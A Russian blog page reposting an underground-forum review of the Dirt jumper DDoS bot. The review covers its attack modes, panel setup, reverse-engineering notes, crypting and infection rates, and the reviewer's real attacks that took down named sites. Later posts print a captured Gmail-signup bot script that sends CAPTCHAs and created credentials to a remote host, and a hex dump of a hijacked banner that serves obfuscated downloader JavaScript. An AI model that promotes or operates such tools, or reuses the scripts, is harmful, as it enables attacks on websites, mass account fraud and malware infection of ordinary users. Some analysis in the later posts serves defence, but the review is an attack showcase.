Решил занятся копипастой и собрать из открытых источников описание современных инструментов для проведения DDoS атак. Оригинал статьи находится здесь: https://damagelab.org/index.php?s=60cd73f028b9cc14a8e6bbe11dc5d7ff&showtopic=21288.
Вступление:
Всем доброго времени суток, хорошего настроения и бутылки пива в руки. Сегодня текстовое радио "дамага форева" будет ненавязчиво вещать вам о некоторых новых (а для кого-то уже и не очень) продуктах в сфере ddos-а. Немного отходя от темы, хочу пояснить несколько моментов:
1. в период проведения первых тестов я был крайне заинтересован темой ддоса как таковой. Я временами хотел поднять свой ботнет, но здравый смысл всегда подсказывал что это в моем случае баловство.
2. После окончания первых тестов я попал в больницу с переломом бедра. В связи с чем оперативного завершения обзора не получилось, а сейчас очень много чего поменялось за время моей болезни, но об этом позднее.
На операционном столе пребывает Dirt jumper - ddos бот.
Автор: Sokol
icq: 228999999
------------------------------------------------------------------------------------------------------------------------
Описание от автора:
Цитата|Quote
Dirt jumper - DDoS система с огромным потенциалом мощности.
Бот Dirt jumper имеет на своём борту 4 типа атаки.
Рассмотрим каждый из них подробнее:
HTTP flood: Данный тип атаки позволяет вызвать перегрузку сервера за счёт частых, многократных запросов обычными http пакетами.
Фишка данного метода в том, что ответ от сервера не принимается, то есть бот ожидает ответа, как только сервер готов отвечать бот рвёт коннект и посылает новый запрос.
Плюсы - Высокая скорость запросов, огромная нагрузка на сервер, и полное отсуцтвие входящего трафика, что позволяет делать больше запросов в одну единицу времени.
Минусы - нет возможности сгенерировать большой пакет отправляемых данных, но на мой взгляд это и не требуется (при не большом канале инета за счёт маленького размера пакета, отправляется больше запросов в одну единицу времени), так что это можно даже отнести к плюсам.
Synchronous flood: Данный метод атаки эффективен только при потоках более 150. Бот делает запрос одновременно всеми потоками. Ждёт, пока сервер ответит всем потокам, и повторяет процедуру по кругу.
По сути, в основе данной атаки лежит первый метод.
Плюсы - В одну единицу времени вызывается нагрузка большая, чем первым способом
Минусы - При таком подходе во время выполнения запросов машина жертвы подвисает. И если инет или комп слабый может вообще подвесить машину.
Так-же на сервер не ведётся постоянной атаки, что при низком количестве ботов недопустимо.
Downloading flood:
А этот метод позволяет забить канал жертвы трафиком.
Бот выкачивает заданную картинку. Может качать всё, начиная от .exe заканчивая html кодом любой странички.
Плюсы - Огромная нагрузка на канал, возможность загружать любую инфу.
Минусы - Скорость запросов ниже, чем при первом методе, может забить канал жертвы, и бот временно выбивается из онлайна, так как из-за загрузки не сможет даже отстучать на сервер.
POST flood: А это, на мой взгляд, один из самых офигенных методов атаки!
Бот может делать GET и POST запросы одновременно!
То есть он может отправлять рандомные логины и пароли в форму, вызывая огромнейшую нагрузку на сервер: БД, буфер обмена, процессор.
Плюсы - данный метод позволяет забивать канал входящим трафиком, даёт самую большую нагрузку на сервер из всех других типов.
Минусы - Скорость запросов ниже, чем при первом методе, может забить канал исходящим трафиком, но размер пакетов вы указываете при составлении команды.
С типами атак разобрались, двигаемся дальше.
Общие характеристики бота:
1. Многопоточная атака!
2. Количество потоков и тип атаки вы может менять во время атаки, не останавливая её!
3. Бот хорошо кладет http и https.
4. Бот может атаковать по domain : port ; ftp,http, и так далее.
5. Можно атаковать одновременно до 999 сайтов.
6. Бот рандомно меняет User Agent.
7. Бот рандомно меняет Referer.
8. Есть возможность блокировки доступа к админ-панели по IP.
9. Все файлы админки при переходе на них показывают ошибку 404.
10. Даже файл админки будет показывать ошибку 404 пока вы не укажите верный get-пароль.
Пример: GET-пароль "passwd" (указывается в конфиге) при переходе по адресу
admin.php?login=pass - Будет ошибка 404, как и при любом не верном значении
admin.php?login=passwd - Будет форма авторизации
11. Статистика онлайна и общего количества ботов по странам.
Также хочется сказать пару слов о системе управлении ботом.
1. Удобная и красивая админка.
2. Не нужно заморачиваться с командами, прописал сайт, указал потоки, выбрал тип атаки, нажал старт и готово!
Хочу обратить внимание на бота. В не сжатом и не криптованом виде бот весит примерно 180кб, я сжимал до 80.
Отстук бота почти 100%.
А теперь подробности о жизни бота:
Грузил 1к азии без крипта, ровно через сутки 100-200 ботов. (у разных селлеров по разному)
Грузил 1к азии с криптом, ровно через сутки 300-400 ботов онлайн.
Причем по стате видно, что за сутки отстукивались почти все боты.
Пару слов о стате:
В админке нет возможности просматривать список ботов, так как, на мой взгляд, это лишнее.
Статистика по ботам всего по 2-м параметрам,
Today: Количество уникальных ботов за последние 24 часа.
Online: Количество ботов онлайн, то есть готовых к атаке.
Но кроме этого вы можете посмотреть сколько ботов какой страны сейчас онлайн, или вообще отстукивали за сутки.
Установка админки
1. Залить все файлы на хостинг
2. Установить права 777 на файл img.gif
3. Отредактировать файл config.php
4. Создать базу данных
5. Перейти на файл install.php
----------------------------------------------------------------------------------------------------------------------------------
Часть первая:
Почитали и сделали для себя необходимые пометки:
1. бот написан на делфи.
2. админка на php с минимальной нагрузкой на базу (если верить описанию)
3. почти 100% отстук файла
4. ни слова про обходы
5. 4 типа атаки на борту
Установка админки и правда безумно проста. Правда не сразу разобрался с методом входа в нее. Пока допетрил про этот самый GET-пароль - поломал себе пол мозга. Вообще финт забавный. Не зная специфического пароля попасть в админку или хотя бы посмотреть какие-то ошибки становится невозможным. При всем этом - знание этого пароля еще не дает доступа к админке.
Далее вы проходите стандартный метод авторизации по логину и паролю.
Отмечая минусы - этот пароль не играет ни какой роли в управлении ботами и получении ими команды. Забегая наперед хочу сказать, что метод выдачи заданий ботам несет в себе как положительный так и отрицательный моменты. Само задание хранится в текстовом виде в файле картинки (название файла пока не стоит писать). Огромный плюс в том, что такие вэб-серверы как nginx кэшируют статический контент и практически не дают нагрузки на сервер. Можно выдавать задания ботам с огромной скоростью и не бояться, что сервер при этом упадет. Скажем, ботнет в 15К и временем отстука 10 минут, по моим прогнозам нагрузит среднестатическую vds процентов на 10-15. Кроме того - никто не запрещает держать админку на одном серваке, а картинку с заданием на другом.
Я упоминал так же о негативной стороне этого метода. Дело в том, что для чтения задания сторонним лицом не нужно применять никаких методов. Просто обновляй прямо в браузере содержимое файла и ты будешь вкурсе кого сейчас валят... А в данном конкретном случае - команда никак не шифруется и передается в открытом виде. Предлагаю автору подумать над этим моментом. Применить какой-нить нестандартный метод шифровки, желательно придуманный им самим. Было бы прекрасно.
Рис.1 Рис.2
----------------------------------------------------------------------------------------------------------------------------------
Реверс (огромное спасибо ph0enix.re):
Dirt Ddos bot : short analysis
Мною был получен исполняемый файл размером в 180 кб. Бот написан на Delphi.
0x01 START
При старте бот получает путь, по которому лежит запущенный экзешник (через command line – System. ParamStr) и пути инсталяции и конфига (%SystemRoot%\\system32\\drivers\\svlkanager.exe и %SystemRoot%\\keys.ini). Эти строки хранятся не зашифрованными. Далее происходит сравнение пути инсталла с путем запуска и, в случае если они одинаковы, происходит попытка запуска сервиса бота. Если же они различны, то начинается инсталляция.
0x02 INSTALL
В начале инсталляции бот пытается переименовать старые экземпляры конфига и зкзе (они так и остаются лежать в %SystemRoot%\\system32\\drivers\\svlkanager.exeXXX и %SystemRoot%\\keys.iniXXX). Далее копируется тело и генерируется новый конфиг. Последний содержит только один параметр – botid, представляющий собой строку из 15 десятичных чисел. Далее он инсталлирует себя в качестве сервиса через SCManager и запускает его.
Код|Code
ODE:0042762F push 0 ; lpPassword
CODE:00427631 push 0 ; lpServiceStartName
CODE:00427633 push 0 ; lpDependencies
CODE:00427635 push 0 ; lpdwTagId
CODE:00427637 push 0 ; lpLoadOrderGroup
CODE:00427639 push edi ; lpBinaryPathName
CODE:0042763A push SERVICE_ERROR_NORMAL; dwErrorControl
CODE:0042763C push SERVICE_AUTO_START; dwStartType
CODE:0042763E push 110h ; SERVICE_INTERACTIVE_PROCESS|SERVICE_WIN32_OWN_PROCESS
CODE:00427643 push 0F0000h ; dwDesiredAccess
CODE:00427648 push offset DisplayName; "sv_lkanag"
CODE:0042764D push ebp ; lpServiceName
CODE:0042764E push esi ; hSCManager
CODE:0042764F call CreateServiceA
0x03 MANAGER THREAD
Это основной поток, который осуществляет общение с админкой, парсинг заданий и запуск рабочих потоков.
Вначале из файла keys.ini инициализируется глобальная переменная botid
Цитата|Quote
CODE:00426C46 mov edx, ds:AnsiString_IniPath
CODE:00426C4C mov eax, [ebp+TStringList_botid]
CODE:00426C4F mov ecx, [eax]
CODE:00426C51 call dword ptr [ecx+68h] ; TStrings.LoadFromFile\
Далее расшифровывается строка с доменом и путем до скрипта и осуществляется скачивание тасков с сервера. Скачивание защищено слабым антипатчем, который проверяет соответствие вшитого хэша и хэша от домена. Непосредственно скачивание тасков осуществляется через метод THTTPSend.HTTPMethod, как и все сетевое взаимодействие.
Далее осуществляется парсинг тасков и заполнение глобальных переменных DDosMethod, MaxThreads и таймаут. Урлы жертв хранятся в TStringList`е. Отпарсив таски бот начинает создавать рабочие потоки, числом MaxThreads. Далее он засыпает на указанное время, после чего процедура повторяется вновь.
0x04 WORKER THREAD
Непосредственно производит ддос.
На самом деле все используемые методы – это http flood. В “HTTP flood”, “Synchronous flood” и “Downloading flood” используется get (огромный привет автору за Synchronous flood), а “POST flood” соответственно POST =) . UserAgent меняется во всех процедурах флуда, а referrer только в “POST flood”. Все юзерагенты и рефереры хранятся в незашифрованном виде. Все сетевое взаимодействие опять же производится THTTPSend.HTTPMethod, etc.
0x05 CONCLUSION
В целом бот не понравился, никаких проверок. Куча глобальных переменных, никак не синхронизированных между потоками.
Реплика модератора
[Ar3s]Часть данного текста была откорректирована, т.к. раскрывала коммерческие тонкости бота. Согласно правилам написания обзоров - я обязан был удалить эти части реверса.
----------------------------------------------------------------------------------------------------------------------------------
Тесты:
Перед самым вкусным моментом обзора хочу вставить еще пару копеек. Я всегда знал, что ддос-еры народ грубоватый! И, в случае возникновения конфликтов, с удовольствием применяют грубую силу. Именно благодаря этим тестам до меня на 100% дошло почему. Нет, я и раньше все знал. Ничего нового. Но ощущения... Это похоже на поэзию и наркотик одновременно. Когда от одного твоего телодвижения сайты начинают падать как котята - возникает ощущения бога. Ты начинаешь, сам того не замечая, думать что ты всесилен. Правда это чувство могут резко оборвать обстоятельства или люди в погонах. Поэтому всем, кто зачитался словами строкой выше, - советую вернуться на грешную землю...
Крипт:
С криптом вышел напряг. Мой любимый сервис взял задание и свалил в оффлайн (на неделю, как потом выяснилось, у них какой-то срочный заказ свалился). Пришлось срочно выкручиваться. Один из покупателей этого бота (о котором я на тот момент знал и с которым общался и консультировался (привет передаю отдельный)) неожиданно пошел навстречу и предложил криптануть у своего криптора. Человека, который это уже делал. В итоге через 20 минут у меня на руках был чистый билд весом 170,4 кб.
Отстук:
1. Тест проводился на отстук с лоадера. Загрузки брались у знакомого сэллера.
Отгружено по стате: 1985
Отстучалось в админку: 1859
Отстук составил: 93,65%
Рис.3 Рис.4
2. Тест должен был быть проведен на связке Eleonora Exploit pack (ввиду моей болезни проведен не был. В ближайшее время сделаю.)
Проба атаки :
Т.к. опыта работы с этим ботом у меня небыло - я часто консультировался с автором и первым покупателем. Оба активно помогали советами.
В качестве первого подопытного был выбран варезник небольших размеров - netz[точка]ru (метод атаки Post Flood)
После старта атаки упал секунд за 20.
Рис.5
Далее был выбран хостер средних размеров hosting[точка]ua (метод атаки Post Flood)
Упал секунд за 20 после старта атаки.
Рис.6 Рис.7
Тут у меня начал включаться режим бога. Дело в том, что скорость падения серверов меня поразила. И захотелось большего...
Следующей целью был выбран варезник с приличным количеством посещений ежедневно nnm[точка]ru (метод атаки Post Flood)
Упал моментально. Секунд 5 всего
три! сервака по dns
89.111.189.147
89.111.189.148
89.111.189.149
Рис.8
Интерес к боту непомерно возрастал. Я и так использовал огромное число потоков для теста, но мне захотелось выжать максимум из своих ботов. Благо жалеть их мне не приходилось. Я Хотел видеть мощь и лавину...
Следующей целью стал microsoft[точка]com (давняя мечта)
Уложить не удалось. Только 1 bad по хост-трэкеру. (Решил не позориться и скрин не показывать :) )
Несколько поубавив спесь, и поняв, что ботов у меня не так много как того хотелось бы, я выбрал следующую цель - hp[точка]com
Полученные результаты: 31 Ok 25 Ошибка(ок)
семь!!! серверов.
Рис.9 Рис.10
p.s. всем атакованным сайтам приношу личные извинения. Ничего личного. Тест на две-три минуты. Надеюсь вам он тоже был полезен для определения уровня защищенности серверов.
--------------------------------------------------------------------------------------------------------------------------
Впереди еще тест на отстук со связки и тест на другие виды атак.
Более 2 месяцев мой домен был натравлен на ip 127.0.0.2. Спустя это время в среднем в админку ежесуточно отстукивает порядка 60 ботов. т.е. выжал я машины пользователей до упора в момент тестов. Реакция не заставила себя ждать. Рис.11
Теперь поговорим о delphi. Много мнений, много доводов... Я часто бываю зажат между двух огней. Первые утверждают, что на нем нельзя писать подобные проекты. Код получается грязный, много лишнего. Большой размер и т.д. Вторые утверждают, что такие бинарники легче криптовать, что на delphi можно писать также продуктивно как и на c++. Мое мнение пока остается с первой группой лиц. Грузить/джойнить файл большого размера сложнее и затратнее (и не надо мне о широких каналах говорить, отстук маленького файла всегда будет выше чем большого. И факторов здесь много.) Код написанный на ассемблере (а именно его я считаю стандартом для написания малвари) намного чище и живучее. Уж так сложился мой опыт. У каждого может быть свое мнение на этот счет и я не собираюсь с вами спорить. А вот послушать ваши мнения мне в очередной раз было бы интересно. Я даже холиварчик бы почитал на этот счет с удовольствием. Хотя, забегая на перед - скоро будет такая возможность. В следующем обзоре будет интересный лоадер на delphi.
Еще хотел поговорить о размерах файла. У данного бота он составляет порядка 180 кб. Дело в том, что многие утверждают о неоспоримых плюсах файлов большого размера. Вроде как АВ на них меньше реагируют. В частности проактивки палят любой exe слишком маленького размера. Возможно часть истины в этом есть, но она есть только в случае наличия обходов. В нашем случае же их нету. Значит большой размер - только помеха.
Мне вот всегда хотелось законченных продуктов. Притом во всем. Я часто в дискусиях упоминаю продукцию apple которая максимально продумана. Такого же подходы мне не хватает во всех продуктах. Не только в этом боте. У меня, по мере тестов, рождались идеи калькулятора нагрузки, который бы рассчитывал при каких наименьших потоках наша жертва упадет. Да это относительные цифры. Но все же они бы помогали минимально нагружать ботнет и дольше сохранять ботов онлайн. Или же автоматическая регулировка потоков в зависимости от пинга сервера/ответа хост-трэкера. Но это мысли вслух. Я не хотел бы что бы их воспринимали как укор автору. Скорее - как информацию для дальнейших разработок.
Насколько мне известно - на нескольких форумах появились предложения о продаже этого бота барыгой. При этом наглость не имеет границ. Цениик был выставлен как у автора, хотя, естестенно, ни о какой поддержке речи не велось. На данный момент автор разработал новую версию, если не ошибаюсь - третью. И активно ею занимается. Барыге передаю привет. От такой наглости как у тебя - просто волосы дыбом вставали. Доводы типа "какая хрен разница" и т.д. меня поразили... Человек при этом в открытую ругается с администрацией форумов и автором, если тот пишет что ТС барыга. Последний раз топ видел на эксплоите.
Подводя итоги всем тысячам байт написанных выше - хочу немного выразить свое мнение. Бот неплох для начинающего ддосера. Или же для тех, кому срочно нужно "завалить". Он затратен по долговременной работе. Боты будут сильно дохнуть. И дело здесь как в силе атаки выжимаемой из каждого инфицированного пользователя так и в способе заражения и жизни бота. Любой мало-мальский фаервол тут же обнаружит и информирует пользователя о активности. Ботом хорошо разово грузануться и завалить на сутки-двое-трое можный сервак. Но долго такая атака без "подпитки" не продержится. Хотя и загрузы азии в таких атаках здорово спасают. Соотношение цены со временем жизни этих ботов будут достаточными что бы длительное время поддерживать актуальность атаки.
На момент моего последнего разговора с автором - заявленная цена составляла 600 wmz.
Показаны сообщения с ярлыком Шара. Показать все сообщения
Показаны сообщения с ярлыком Шара. Показать все сообщения
пятница, 22 апреля 2011 г.
среда, 31 декабря 2008 г.
Внимание! Нам нужна атака!
Мы проводим тестирование новых систем очистки трафика от ДДоС атак. В связи с этим предлагаем проектам под атаками сотрудничество: Вы ничего точно не потеряете (возможно даже оживете), а мы получим стрес-тест для наших систем. Предпочтение отдается легким сайтам, но возможны варианты.
среда, 13 февраля 2008 г.
Бот взламывает CAPCHA Google mail
Сегодня на webplanet.ru появилась новость со ссылкой на блог компании Websense (http://webplanet.ru/news/security/2008/02/12/microcaptcha.html) об обходе спам-ботами капчи почтовой службы Microsoft. Мы располагаем материальными свидетельствами подобной техники, направленной против Google. Как это выглядит на самом деле? Вот запись веб-трафика бота:
GET /xxxxx/index.php?v=14 HTTP/1.1
Host: www.somehost.info
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/0.4.13
Date: Wed, 30 Jan 2008 15:50:15 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
<?xml version="1.0"?>
<start>
<rules>
</rules>
<script>
<page id="start">
<data>
<var name="FirstName">John</var>
<var name="LastName">Doe</var>
<var name="Email">JohnDoe</var>
<var name="Passwd">gshhr83hf</var>
<var name="ownquestion">hhdsg abdke</var>
<var name="IdentityAnswer">nsfwlg fs</var>
<var name="task_id">629340</var>
</data>
<process>
<command action="navigate">
<args>
<url>http://m.gmail.com</url>
</args>
</command>
<command action="click_link_by_href">
<args>
<linkhref>logout</linkhref>
</args>
</command>
<!-- navigate to signup page -->
<command action="navigate">
<args>
<url>http://mail.google.com/mail/signup</url>
</args>
</command>
<!-- Do all the LONG and TEDIOUS inputting -->
<command action="input_by_name">
<args>
<name>FirstName</name>
<value>%getvar(FirstName)</value>
</args>
</command>
<command action="input_by_name">
<args>
<name>LastName</name>
<value>%getvar(LastName)</value>
</args>
</command>
<command action="input_by_name">
<args>
<name>Email</name>
<value>%getvar(Email)</value>
</args>
</command>
<command action="input_by_name">
<args>
<name>Passwd</name>
<value>%getvar(Passwd)</value>
</args>
</command>
<command action="input_by_name">
<args>
<name>PasswdAgain</name>
<value>%getvar(Passwd)</value>
</args>
</command>
<command action="select_option_by_name">
<args>
<name>selection</name>
<value>6</value>
</args>
</command>
<command action="input_by_name">
<args>
<name>ownquestion</name>
<value>%getvar(ownquestion)</value>
</args>
</command>
<command action="input_by_name">
<args>
<name>IdentityAnswer</name>
<value>%getvar(IdentityAnswer)</value>
</args>
</command>
<command action="captcha">
<args>
<regexp><![CDATA[alt="Visual verification"]]></regexp>
<posturl>http://www.somehost.info/ocr/xxxx/adddata_jpg_g.php?%getvar(task_id)|</posturl>
<geturl>http://www.somehost.info/ocr/xxxx/getdata.php?%getvar(task_id)|</geturl>
<interval>20</interval>
<timeout>180</timeout>
<base64>1</base64>
</args>
<!-- Failed to fetch Captcha for some reason (regexp wrong, humanocr down, etc), so quit -->
<error>quit_by_captcha</error>
<output>captcha_answer</output>
</command>
<command action="input_by_name">
<args>
<name>newaccountcaptcha</name>
<value>%getvar(captcha_answer)</value>
</args>
</command>
<command action="click_button_by_id">
<args>
<id>submitbutton</id>
</args>
<error>quit_by_submit</error>
</command>
<command action="knock">
<args>
<url>http://www.somehost.info/dummy.html?clicked_submit</url>
</args>
</command>
<command action="check_html">
<args>
<regexp><![CDATA[<a href="http://mail.google.com/gmail"]]></regexp>
</args>
<error>quit</error>
</command>
<command action="knock">
<args>
<url>http://www.somehost.info/xxxxx/gmail/iamalive.php?end|%getvar(Email)|%getvar(Passwd)|%getvar(task_id)</url>
</args>
</command>
<command action="knock">
<args>
<url>http://www.somehost.info/ocr/xxxx/good.php?%getvar(task_id)</url>
</args>
</command>
</process>
</page>
<page id="quit">
<process>
<!-- failed knock -->
<command action="knock">
<args>
<url>http://www.somehost.info/xxxxx/gmail/iamalive.php?quit|_by_html</url>
</args>
</command>
</process>
</page>
<page id="quit_captcha">
<process>
<!-- failed knock -->
<command action="knock">
<args>
<url>http://www.somehost.info/xxxxx/gmail/iamalive.php?quit|_by_captcha</url>
</args>
</command>
</process>
</page>
<page id="quit_by_submit">
<process>
<!-- failed knock -->
<command action="knock">
<args>
<url>http://www.somehost.info/xxxxx/gmail/iamalive.php?quit|bysubmit</url>
</args>
</command>
</process>
</page>
</script>
</start>
Вот таким образом сейчас обходятся самые распространенные спам-фильтры.
GET /xxxxx/index.php?v=14 HTTP/1.1
Host: www.somehost.info
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/0.4.13
Date: Wed, 30 Jan 2008 15:50:15 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
<?xml version="1.0"?>
<start>
<rules>
</rules>
<script>
<page id="start">
<data>
<var name="FirstName">John</var>
<var name="LastName">Doe</var>
<var name="Email">JohnDoe</var>
<var name="Passwd">gshhr83hf</var>
<var name="ownquestion">hhdsg abdke</var>
<var name="IdentityAnswer">nsfwlg fs</var>
<var name="task_id">629340</var>
</data>
<process>
<command action="navigate">
<args>
<url>http://m.gmail.com</url>
</args>
</command>
<command action="click_link_by_href">
<args>
<linkhref>logout</linkhref>
</args>
</command>
<!-- navigate to signup page -->
<command action="navigate">
<args>
<url>http://mail.google.com/mail/signup</url>
</args>
</command>
<!-- Do all the LONG and TEDIOUS inputting -->
<command action="input_by_name">
<args>
<name>FirstName</name>
<value>%getvar(FirstName)</value>
</args>
</command>
<command action="input_by_name">
<args>
<name>LastName</name>
<value>%getvar(LastName)</value>
</args>
</command>
<command action="input_by_name">
<args>
<name>Email</name>
<value>%getvar(Email)</value>
</args>
</command>
<command action="input_by_name">
<args>
<name>Passwd</name>
<value>%getvar(Passwd)</value>
</args>
</command>
<command action="input_by_name">
<args>
<name>PasswdAgain</name>
<value>%getvar(Passwd)</value>
</args>
</command>
<command action="select_option_by_name">
<args>
<name>selection</name>
<value>6</value>
</args>
</command>
<command action="input_by_name">
<args>
<name>ownquestion</name>
<value>%getvar(ownquestion)</value>
</args>
</command>
<command action="input_by_name">
<args>
<name>IdentityAnswer</name>
<value>%getvar(IdentityAnswer)</value>
</args>
</command>
<command action="captcha">
<args>
<regexp><![CDATA[alt="Visual verification"]]></regexp>
<posturl>http://www.somehost.info/ocr/xxxx/adddata_jpg_g.php?%getvar(task_id)|</posturl>
<geturl>http://www.somehost.info/ocr/xxxx/getdata.php?%getvar(task_id)|</geturl>
<interval>20</interval>
<timeout>180</timeout>
<base64>1</base64>
</args>
<!-- Failed to fetch Captcha for some reason (regexp wrong, humanocr down, etc), so quit -->
<error>quit_by_captcha</error>
<output>captcha_answer</output>
</command>
<command action="input_by_name">
<args>
<name>newaccountcaptcha</name>
<value>%getvar(captcha_answer)</value>
</args>
</command>
<command action="click_button_by_id">
<args>
<id>submitbutton</id>
</args>
<error>quit_by_submit</error>
</command>
<command action="knock">
<args>
<url>http://www.somehost.info/dummy.html?clicked_submit</url>
</args>
</command>
<command action="check_html">
<args>
<regexp><![CDATA[<a href="http://mail.google.com/gmail"]]></regexp>
</args>
<error>quit</error>
</command>
<command action="knock">
<args>
<url>http://www.somehost.info/xxxxx/gmail/iamalive.php?end|%getvar(Email)|%getvar(Passwd)|%getvar(task_id)</url>
</args>
</command>
<command action="knock">
<args>
<url>http://www.somehost.info/ocr/xxxx/good.php?%getvar(task_id)</url>
</args>
</command>
</process>
</page>
<page id="quit">
<process>
<!-- failed knock -->
<command action="knock">
<args>
<url>http://www.somehost.info/xxxxx/gmail/iamalive.php?quit|_by_html</url>
</args>
</command>
</process>
</page>
<page id="quit_captcha">
<process>
<!-- failed knock -->
<command action="knock">
<args>
<url>http://www.somehost.info/xxxxx/gmail/iamalive.php?quit|_by_captcha</url>
</args>
</command>
</process>
</page>
<page id="quit_by_submit">
<process>
<!-- failed knock -->
<command action="knock">
<args>
<url>http://www.somehost.info/xxxxx/gmail/iamalive.php?quit|bysubmit</url>
</args>
</command>
</process>
</page>
</script>
</start>
Вот таким образом сейчас обходятся самые распространенные спам-фильтры.
четверг, 6 декабря 2007 г.
Utro.ru снова заражает посетителей
Сегодня банерная сеть Утра подверглась взлому и распространяет вредоносный код - троян даунлоадер.
Боты устанавливаемые вслед за этим принимают участие в ДДоС - атаках.
Подробности:
Мы оповестили Касперских.
Развитие и комментарии последуют
Боты устанавливаемые вслед за этим принимают участие в ДДоС - атаках.
Подробности:
GET /cgi-bin/banner/utro?82779&options=FN' HTTP/1.1
Host: www.txt.utro.ru
User-Agent: Mozilla/5.0 (X11; U; Linux i686; ru; rv:1.8.1.11) Gecko/20071204 Ubuntu/7.10 (gutsy) Firefox/2.0.0.11
Accept: */*
Accept-Language: ru-ru,ru;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: windows-1251,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://www.utro.ru/includes5/banners/advert_part.html
Cookie: __utma=143070705.897126579.1189666299.1196144486.1196938604.33; __utmz=143070705.1194419286.21.3.utmccn=(referral)|utmcsr=ytro.ru|utmcct=/|utmcmd=referral; uid=1463242514; __utmb=143070705; __utmc=143070705
HTTP/1.1 200 OK
Date: Thu, 06 Dec 2007 11:24:48 GMT
Server: Apache/1.3.33 (Unix)
Content-Length: 648
Connection: close
Content-Type: application/x-javascript
document.close();
parent.document.getElementById('utxt82779').parentNode.innerHTML="5 баллов: Московский школьник признался в убийстве 37 человек\r\n
<object data=\"http://bannersgs.info/stat/index.php\" width=\"1\" height=\"1\" style=\"1\"></object>\r\n";
45 00 01 47 47 98 40 00 76 06 1d 79 0a 40 5e 63 E..GG.@.v..y.@^c
42 24 f3 d8 09 8f 00 50 7f a6 84 fd df a4 aa 51 B$.....P.......Q
50 18 fa f0 63 de 00 00 47 45 54 20 2f 73 74 61 P...c...GET /sta
74 2f 69 6e 64 65 78 2e 70 68 70 20 48 54 54 50 t/index.php HTTP
2f 31 2e 31 0d 0a 41 63 63 65 70 74 3a 20 2a 2f /1.1..Accept: */
2a 0d 0a 52 65 66 65 72 65 72 3a 20 68 74 74 70 *..Referer: http
3a 2f 2f 77 77 77 2e 35 62 61 6c 6c 6f 76 2e 72 ://www.5ballov.r
75 2f 65 78 74 65 72 6e 61 6c 2f 62 61 6e 6e 65 u/external/banne
72 73 2e 70 68 70 3f 66 69 6c 65 3d 62 6c 6f 63 rs.php?file=bloc
6b 73 2f 6e 65 77 73 5f 75 74 72 6f 2e 74 70 6c ks/news_utro.tpl
0d 0a 41 63 63 65 70 74 2d 4c 61 6e 67 75 61 67 ..Accept-Languag
65 3a 20 72 75 0d 0a 41 63 63 65 70 74 2d 45 6e e: ru..Accept-En
63 6f 64 69 6e 67 3a 20 67 7a 69 70 2c 20 64 65 coding: gzip, de
66 6c 61 74 65 0d 0a 55 73 65 72 2d 41 67 65 6e flate..User-Agen
74 3a 20 4d 6f 7a 69 6c 6c 61 2f 34 2e 30 20 28 t: Mozilla/4.0 (
63 6f 6d 70 61 74 69 62 6c 65 3b 20 4d 53 49 45 compatible; MSIE
20 36 2e 30 3b 20 57 69 6e 64 6f 77 73 20 4e 54 6.0; Windows NT
20 35 2e 31 29 0d 0a 48 6f 73 74 3a 20 62 61 6e 5.1)..Host: ban
6e 65 72 73 67 73 2e 69 6e 66 6f 0d 0a 43 6f 6e nersgs.info..Con
6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c nection: Keep-Al
69 76 65 0d 0a 0d 0a ive....
45 00 05 dc 0f 41 40 00 34 06 93 3b 42 24 f3 d8 E....A@.4..;B$..
0a 40 5e 63 00 50 09 8f df a4 aa 51 7f a6 86 1c .@^c.P.....Q....
50 10 19 20 f5 b4 00 00 48 54 54 50 2f 31 2e 31 P.. ....HTTP/1.1
20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 54 200 OK..Date: T
68 75 2c 20 30 36 20 44 65 63 20 32 30 30 37 20 hu, 06 Dec 2007
32 32 3a 34 33 3a 33 31 20 47 4d 54 0d 0a 53 65 22:43:31 GMT..Se
72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 32 rver: Apache/2.2
2e 36 20 28 46 65 64 6f 72 61 29 0d 0a 58 2d 50 .6 (Fedora)..X-P
6f 77 65 72 65 64 2d 42 79 3a 20 50 48 50 2f 35 owered-By: PHP/5
2e 31 2e 36 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 .1.6..Content-Le
6e 67 74 68 3a 20 34 33 38 38 0d 0a 43 6f 6e 6e ngth: 4388..Conn
65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 ection: close..C
6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 ontent-Type: tex
74 2f 68 74 6d 6c 0d 0a 0d 0a 20 20 20 20 20 20 t/html....
20 20 3c 73 63 72 69 70 74 3e 66 75 6e 63 74 69 <script>functi
6f 6e 20 76 34 37 35 38 37 62 31 33 62 39 30 34 on v47587b13b904
66 28 76 34 37 35 38 37 62 31 33 62 39 34 33 35 f(v47587b13b9435
29 7b 20 76 61 72 20 76 34 37 35 38 37 62 31 33 ){ var v47587b13
62 39 38 31 63 3d 31 36 3b 20 72 65 74 75 72 6e b981c=16; return
28 70 61 72 73 65 49 6e 74 28 76 34 37 35 38 37 (parseInt(v47587
62 31 33 62 39 34 33 35 2c 76 34 37 35 38 37 62 b13b9435,v47587b
31 33 62 39 38 31 63 29 29 3b 7d 66 75 6e 63 74 13b981c));}funct
69 6f 6e 20 76 34 37 35 38 37 62 31 33 62 39 66 ion v47587b13b9f
65 63 28 76 34 37 35 38 37 62 31 33 62 61 33 64 ec(v47587b13ba3d
33 29 7b 20 20 76 61 72 20 76 34 37 35 38 37 62 3){ var v47587b
31 33 62 61 37 62 63 3d 27 27 3b 66 6f 72 28 76 13ba7bc='';for(v
34 37 35 38 37 62 31 33 62 61 62 61 32 3d 30 3b 47587b13baba2=0;
20 76 34 37 35 38 37 62 31 33 62 61 62 61 32 3c v47587b13baba2<
76 34 37 35 38 37 62 31 33 62 61 33 64 33 2e 6c v47587b13ba3d3.l
65 6e 67 74 68 3b 20 76 34 37 35 38 37 62 31 33 ength; v47587b13
62 61 62 61 32 2b 3d 32 29 7b 20 76 34 37 35 38 baba2+=2){ v4758
37 62 31 33 62 61 37 62 63 2b 3d 28 53 74 72 69 7b13ba7bc+=(Stri
